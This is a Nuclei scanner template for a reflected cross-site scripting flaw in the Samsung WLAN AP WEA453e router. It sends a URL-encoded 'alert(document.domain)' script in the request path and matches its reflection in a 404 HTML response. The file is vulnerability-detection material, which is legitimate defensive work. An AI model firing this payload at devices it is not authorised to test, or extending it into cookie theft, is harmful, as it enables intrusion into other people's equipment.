nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml

38 lines
1000 B
YAML

id: samsung-wlan-ap-xss
info:
name: Samsung WLAN AP WEA453e - Cross-Site Scripting
author: pikpikcu
severity: high
description: Samsung WLAN AP WEA453e router contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
reference:
- https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: xss,samsung
requests:
- method: GET
path:
- "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
words:
- "/tmp/www/<script>alert(document.domain)</script>"
part: body
- type: status
status:
- 404
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/09/23